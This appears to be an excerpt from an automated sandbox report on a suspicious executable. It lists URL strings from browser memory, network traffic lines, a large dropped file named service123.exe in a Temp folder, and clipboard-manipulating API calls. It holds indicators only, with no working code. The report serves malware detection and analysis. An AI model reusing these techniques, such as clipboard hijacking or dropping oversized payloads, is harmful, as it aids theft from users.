Source: chrome.exe, 0000000A.00000002.1717882214.000077D40297C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716783630.000077D402708000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1722075396.000077D403034000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000000A.00000003.1697244740.000077D4025AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716258936.000077D402578000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1719043134.000077D402B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 0000000A.00000002.1719043134.000077D402B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: chrome.exe, 0000000A.00000002.1720281101.000077D402E28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabk
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: ehoYPkfWhVokJMBQaExv.dll.2.dr	String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: chrome.exe, 0000000A.00000003.1684991603.000031A000684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1712153972.000031A00078C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 0000000A.00000003.1684704880.000031A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1712332797.000031A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1684483515.000031A000390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 0000000A.00000003.1684991603.000031A000684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/gj
Source: chrome.exe, 0000000A.00000003.1684991603.000031A000684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1712153972.000031A00078C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 0000000A.00000003.1684991603.000031A000684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/1
Source: chrome.exe, 0000000A.00000003.1684704880.000031A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1712332797.000031A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1684483515.000031A000390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 0000000A.00000003.1684991603.000031A000684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 0000000A.00000003.1684991603.000031A000684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 0000000A.00000003.1685296774.000031A0006E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 0000000A.00000003.1684704880.000031A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1712332797.000031A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1684483515.000031A000390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
Source: chrome.exe, 0000000A.00000002.1714282835.000077D40220C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1715458976.000077D4023E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: chrome.exe, 0000000A.00000002.1715458976.000077D4023E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/googleapis.com
Source: chrome.exe, 0000000A.00000002.1717268170.000077D402858000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleusercontent.com/
Source: SwJD3kiOwV.exe, 00000002.00000003.1295175578.000000000793F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/ip
Source: SwJD3kiOwV.exe, 00000002.00000003.1295175578.000000000793F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/ipbefore
Source: chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 0000000A.00000002.1717955813.000077D4029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1718020308.000077D4029D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1720780216.000077D402F14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716708558.000077D4026D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 0000000A.00000002.1717955813.000077D4029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1718020308.000077D4029D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1720780216.000077D402F14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716708558.000077D4026D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 0000000A.00000002.1712093398.000031A000770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1719364584.000077D402C0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 0000000A.00000002.1710887648.000031A000238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1712093398.000031A000770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1719364584.000077D402C0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 0000000A.00000002.1710887648.000031A000238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1712093398.000031A000770000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard1
Source: chrome.exe, 0000000A.00000003.1684704880.000031A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1712332797.000031A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1684483515.000031A000390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 0000000A.00000003.1684704880.000031A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1712332797.000031A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1684483515.000031A000390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 0000000A.00000002.1712093398.000031A000770000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 0000000A.00000002.1712093398.000031A000770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1719364584.000077D402C0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 0000000A.00000003.1697390107.000077D403380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697530555.000077D403458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697244740.000077D4025AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 0000000A.00000003.1697390107.000077D403380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697530555.000077D403458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697244740.000077D4025AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 0000000A.00000003.1685351539.000031A0006EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 0000000A.00000003.1684483515.000031A000390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 0000000A.00000002.1712153972.000031A00078C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
Source: chrome.exe, 0000000A.00000002.1712153972.000031A00078C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918
Source: chrome.exe, 0000000A.00000002.1712062361.000031A000744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: chrome.exe, 0000000A.00000002.1715458976.000077D4023E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716258936.000077D402578000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 0000000A.00000002.1717882214.000077D40297C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716783630.000077D402708000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1722075396.000077D403034000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 0000000A.00000002.1717955813.000077D4029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716640277.000077D4026B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1723592823.000077D4031BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 0000000A.00000002.1717587909.000077D4028FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1717955813.000077D4029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716640277.000077D4026B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 0000000A.00000002.1717587909.000077D4028FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhonetp
Source: chrome.exe, 0000000A.00000002.1717955813.000077D4029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716640277.000077D4026B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1723592823.000077D4031BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 0000000A.00000002.1719301312.000077D402BEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1719043134.000077D402B97000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1695606383.000077D403268000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 0000000A.00000002.1715458976.000077D4023E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 0000000A.00000002.1715548648.000077D40240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 0000000A.00000002.1714546028.000077D40229C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 0000000A.00000002.1716708558.000077D4026D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 0000000A.00000002.1719301312.000077D402BEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1719043134.000077D402B97000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1695606383.000077D403268000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 0000000A.00000003.1697390107.000077D403380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697530555.000077D403458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697244740.000077D4025AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 0000000A.00000002.1719301312.000077D402BEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1719043134.000077D402B97000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1695606383.000077D403268000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 0000000A.00000002.1714682334.000077D4022D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 0000000A.00000002.1714787857.000077D4022EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 0000000A.00000002.1715458976.000077D4023E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 0000000A.00000002.1717955813.000077D4029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1718020308.000077D4029D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1720780216.000077D402F14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716708558.000077D4026D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000000A.00000002.1717955813.000077D4029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1718020308.000077D4029D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1720780216.000077D402F14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716708558.000077D4026D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 0000000A.00000002.1719364584.000077D402C0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 0000000A.00000002.1715458976.000077D4023E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 0000000A.00000002.1717477312.000077D4028CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 0000000A.00000002.1720281101.000077D402E28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 0000000A.00000002.1720281101.000077D402E28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 0000000A.00000002.1720281101.000077D402E28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 0000000A.00000002.1717303494.000077D40286C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1714355833.000077D402220000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 0000000A.00000003.1692504233.000077D402F80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 0000000A.00000002.1718120915.000077D402A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 0000000A.00000002.1719364584.000077D402C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1720749280.000077D402F00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 0000000A.00000002.1720749280.000077D402F00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2ssageHandler
Source: chrome.exe, 0000000A.00000002.1724192776.000077D403250000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1726195668.000077D403414000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Source: chrome.exe, 0000000A.00000002.1721868169.000077D402FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 0000000A.00000002.1725051128.000077D40333C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1718986750.000077D402B54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1715458976.000077D4023E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1718060753.000077D4029F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 0000000A.00000002.1725051128.000077D40333C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1718986750.000077D402B54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1715458976.000077D4023E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1718060753.000077D4029F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 0000000A.00000002.1718643415.000077D402A9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: chrome.exe, 0000000A.00000002.1716821084.000077D402720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716783630.000077D402708000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1720030517.000077D402DDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 0000000A.00000002.1716821084.000077D402720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoenterInsightsnetwork.mojom.URLLoa
Source: chrome.exe, 0000000A.00000003.1697244740.000077D4025AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 0000000A.00000002.1716708558.000077D4026D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 0000000A.00000002.1719442664.000077D402C38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 0000000A.00000002.1714355833.000077D402220000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 0000000A.00000002.1715548648.000077D40240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 0000000A.00000002.1715548648.000077D40240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 0000000A.00000002.1715548648.000077D40240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1717056967.000077D4027D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 0000000A.00000002.1715548648.000077D40240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1715458976.000077D4023E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 0000000A.00000002.1716708558.000077D4026D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1715957583.000077D4024D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 15_2_6C9D9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,

15_2_6C9D9C22

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6C9D9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,		15_2_6C9D9C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6C9D9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,		15_2_6C9D9D11

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 15_2_6C9D9E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

15_2_6C9D9E27

System Summary

Drops large PE files

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe

File dump: service123.exe.2.dr 314617856

Jump to dropped file

PE file contains section with special chars

Source: SwJD3kiOwV.exe	Static PE information: section name:
Source: SwJD3kiOwV.exe	Static PE information: section name: .idata
Source: SwJD3kiOwV.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_001C51B0	15_2_001C51B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_001C3E20	15_2_001C3E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA02CCE	15_2_6CA02CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6C9CCD00	15_2_6C9CCD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6C9CEE50	15_2_6C9CEE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6C9D0FC0	15_2_6C9D0FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA10AC0	15_2_6CA10AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6C9D44F0	15_2_6C9D44F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA046E0	15_2_6CA046E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6C9F87C0	15_2_6C9F87C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA007D0	15_2_6CA007D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA02090	15_2_6CA02090
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA10060	15_2_6CA10060
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6C9F2360	15_2_6C9F2360
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA1DC70	15_2_6CA1DC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6C9D5880	15_2_6C9D5880
